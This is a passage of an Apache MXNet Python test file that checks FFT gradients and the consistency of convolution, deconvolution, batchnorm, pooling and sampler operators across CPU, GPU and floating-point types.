(shape[0],2*shape[1])) # out_grad_to_complex out_grad_complex = np.zeros(shape,dtype = np.complex64) for i in range(0,shape[1]): out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i] out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1] for exe in exe_list: exe.backward([out_grad]) a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None) assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-8) if len(shape) == 4: out_grad = mx.nd.empty(out1[0].shape) out_grad[:] = np.random.normal(-3, 3, out1[0].shape) # out_grad_to_complex out_grad_complex = np.zeros(shape,dtype = np.complex64) for i in range(0,shape[3]): out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i] out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1] for exe in exe_list: exe.backward([out_grad]) a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None) assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-6) @with_seed(0) def test_fft(): nrepeat = 2 maxdim = 10 for repeat in range(nrepeat): for order in [2,4]: shape = tuple(np.random.randint(1, maxdim, size=order)) check_fft(shape) @with_seed() @unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10087") def test_batchnorm_with_type(): ctx_list_v1_2D = [ {'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}}, ] ctx_list_v2_2D = [ {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}}, ] ctx_list_v2_1D = [ {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}}, ] ctx_list_v2_3D = [ {'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}, {'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}}, {'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}}, {'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}} ] # V1, 2D sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False) check_consistency(sym, ctx_list_v1_2D) sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True) check_consistency(sym, ctx_list_v1_2D) # V2, 2D sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True) check_consistency(sym, ctx_list_v2_2D) sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True) check_consistency(sym, ctx_list_v2_2D) sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True) check_consistency(sym, ctx_list_v2_2D) sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True) check_consistency(sym, ctx_list_v2_2D) # V2, 1D sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True) check_consistency(sym, ctx_list_v2_1D) sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True) check_consistency(sym, ctx_list_v2_1D) sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True) check_consistency(sym, ctx_list_v2_1D) sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True) check_consistency(sym, ctx_list_v2_1D) # # # V2, 3D sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True) check_consistency(sym, ctx_list_v2_3D) sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True) check_consistency(sym, ctx_list_v2_3D) @with_seed() def test_batchnorm_versions(): def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats): ctx_list = [] sym_list = [] # BatchNormV1 cpu if 'batchnorm_v1_cpu' in batchnorm_op_list: ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma, use_global_stats=use_global_stats, name='batchnorm')) # BatchNormV1 gpu (organic) if 'batchnorm_v1_gpu' in batchnorm_op_list: ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma, use_global_stats=use_global_stats, name='batchnorm')) # BatchNorm cpu if 'batchnorm_cpu' in batchnorm_op_list: ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma, use_global_stats=use_global_stats, name='batchnorm')) # BatchNorm gpu (organic) if 'batchnorm_gpu' in batchnorm_op_list: ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma, use_global_stats=use_global_stats, name='batchnorm', cudnn_off=True)) # BatchNorm gpu cudnn (if cudnn is enabled) if 'batchnorm_cudnn' in batchnorm_op_list: ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma, use_global_stats=use_global_stats, name='batchnorm', cudnn_off=False)) check_consistency(sym_list, ctx_list) def test_1d_batchnorm(fix_gamma, use_global_stats): data = (2, 3, 20) test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu', 'batchnorm_gpu', 'batchnorm_cudnn'], data=data, fix_gamma=fix_gamma, use_global_stats=use_global_stats) def test_2d_batchnorm(fix_gamma, use_global_stats): data = (2, 3, 10, 10) test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu', 'batchnorm_cpu', 'batchnorm_gpu', 'batchnorm_cudnn'], data=data, fix_gamma=fix_gamma, use_global_stats=use_global_stats) def test_3d_batchnorm(fix_gamma, use_global_stats): data = (2, 3, 3, 5, 5) test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu', 'batchnorm_gpu'], data=data, fix_gamma=fix_gamma, use_global_stats=use_global_stats) test_1d_batchnorm(True, False) test_1d_batchnorm(False, False) test_1d_batchnorm(False, True) test_1d_batchnorm(True, True) test_2d_batchnorm(True, False) test_2d_batchnorm(False, False) test_2d_batchnorm(False, True) test_2d_batchnorm(True, True) test_3d_batchnorm(True, False) test_3d_batchnorm(False, False) test_3d_batchnorm(False, True) test_3d_batchnorm(True, True) @with_seed(1234) @assert_raises_cudnn_disabled() def test_convolution_with_type(): sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv') data = mx.sym.Variable('conv_data') w = mx.sym.Variable('conv_weight') b = mx.sym.Variable('conv_bias') w = mx.sym.transpose(w, axes=(0,2,3,1)) sym2 = mx.sym.transpose(data, axes=(0,2,3,1)) sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3)) sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv') sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2] ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}}, # NHWC {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3), 'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3), 'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}} ] # wider tolerance needed for true-fp16 NCHW test above tol = {np.dtype(np.float16): 0.5, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, tol=tol) # test ability to turn off training on bias check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol) # Apply N symbols against each of M contexts, checking that all NxM combinations match. def check_consistency_NxM(sym_list, ctx_list): # e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are: # sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3] check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5) @unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141") @with_seed() def test_convolution_options(): # 1D convolution ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}] # Pad > 0 sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 1x1 convolution sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 2D convolution ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}] # Pad > 0 sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 1x1 convolution sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 3D convolution ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] # Pad > 0 sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 1x1 convolution sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c. # Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f). @with_seed() def test_convolution_large_c(): problematic_c = 64 * 1024 # The convolution accumulates many values, so set large tolerances. tol = {np.dtype(np.float32): 1, np.dtype(np.float64): 1} def test_1D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}] sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv') check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req) def test_2D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}] sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv') check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req) # Run with different data tensor shapes to run cudnnFind() multiple times. # First, populate algo and op caches with models that always use cudnnFind() (req == 'write'). # Then run models that must avoid cached cudnnFind() results in some cases (req == 'add'). widths = [4, 16, 64] for req in ['write', 'add']: for width in widths: test_1D_with_width(width, req) test_2D_with_width(width, req) # This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c. # Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f). @with_seed() def test_deconvolution_large_c(): problematic_c = 64 * 1024 # The deconvolution accumulates many values, so set large tolerances. tol = {np.dtype(np.float32): 1, np.dtype(np.float64): 1} def test_1D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}] sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv') check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req) def test_2D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}] sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv') check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req) # Run with different data tensor shapes to run cudnnFind() multiple times. # First, populate algo and op caches with models that always use cudnnFind() (req == 'write'). # Then run models that must avoid cached cudnnFind() results in some cases (req == 'add'). widths = [4, 16, 64] for req in ['write', 'add']: for width in widths: test_1D_with_width(width, req) test_2D_with_width(width, req) @with_seed() def test_convolution_versions(): # 2D convolution NCHW ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}] conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu] check_consistency(syms, ctx_list) # 3D convolution NCDHW ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') syms = [conv_cudnn, conv_cpu, conv_gpu] check_consistency(syms, ctx_list) @with_seed() def test_pooling_with_type(): ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}, {'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}}, {'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}] sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool') check_consistency(sym, ctx_list) @with_seed() def test_deconvolution_with_type(): # Test basic deconvolution without exercising stride, pad or dilation. # 1D deconvolution sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv') ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}] # wider tolerance needed for true-fp16 test above tol = {np.dtype(np.float16): 0.3, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, tol=tol) check_consistency(sym, ctx_list, tol=tol, grad_req="add") # 2D deconvolution sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv') ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}] # wider tolerance needed for true-fp16 test above tol = {np.dtype(np.float16): 0.3, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, tol=tol) check_consistency(sym, ctx_list, tol=tol, grad_req="add") @with_seed() def test_deconvolution_options(): # 1D deconvolution ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}] # Pad > 0 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 2D deconvolution ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}] # Pad > 0 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # # 3D deconvolution (not yet enabled) # ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] # # Pad > 0 # sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') # sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') # check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # # Stride > 1 # sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv') # sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv') # check_consistency_NxM([sym, sym_no_cudnn], ctx_list) @with_seed(1234) def test_bilinear_sampler_with_type(): data = mx.sym.Variable('data') grid = mx.sym.Variable('grid') sym = mx.sym.BilinearSampler(data=data, grid=grid) ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float32}}, {'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float16}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") @with_seed() def test_grid_generator_with_type(): data = mx.sym.Variable('data') sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20)) ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}, {'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20)) ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}, {'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") @unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. https://github.com/apache/incubator-mxnet/issues/11839") @with_seed() def test_spatial_transformer_with_type(): data = mx.sym.Variable('data') loc = mx.sym.Flatten(data) loc = mx.sym.FullyConnected(data=loc, num_hidden=10) loc = mx.sym.Activation(data=loc, act_type='relu') loc = mx.sym.FullyConnected(data=loc, num_hidden=6) sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10), transform_type="affine", sampler_type="bilinear") ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}] check_consistency(sym, ctx_list) 